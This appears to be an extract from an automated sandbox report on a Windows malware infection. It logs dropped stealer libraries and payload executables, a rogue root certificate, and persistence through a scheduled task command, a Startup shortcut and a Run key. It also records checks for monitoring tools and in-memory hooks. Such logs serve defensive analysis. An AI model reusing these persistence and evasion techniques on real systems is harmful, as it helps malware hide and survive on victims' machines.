Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lamp[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\newstar.exe
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66d1b7f7f3765_Front[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\lnef[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\filename.exe
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\Temp\is-QIRUR.tmp\_isetup\_setup64.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\libssl-1_1.dll (copy)
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe File created: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\is-KRTJG.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66d98aa7bea3e_newPrime[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66d70e8640404_trics[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66c6fcb30b9dd_123p[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\is-9IS1N.tmp
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\Temp\is-QIRUR.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\libeay32.dll (copy)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sgnr[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66d897ad1752a_File[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\is-2Q3FJ.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vjgg[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\is-EAF0N.tmp
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\ssleay32.dll (copy)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vjgg[1].exe
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe File created: C:\ProgramData\jewkkwnf\jewkkwnf.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\userJJJJDAAECG.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66d59ef9d4404_premium[1].exe
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe File created: C:\ProgramData\DB Light Pack Engine 9.6.45\DB Light Pack Engine 9.6.45.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\install[1].exe
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe File created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe File created: C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[2].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\userDGHCBAAEHC.exe
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\Temp\is-QIRUR.tmp\_isetup\_shfoldr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66d9de22f231f_crypted[1].exe
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe File created: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp

Boot Survival

Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Memory written: PID: 8064 base: 7FFE22370008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Memory written: PID: 8064 base: 7FFE2220D9F0 value: E9 20 26 16 00
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
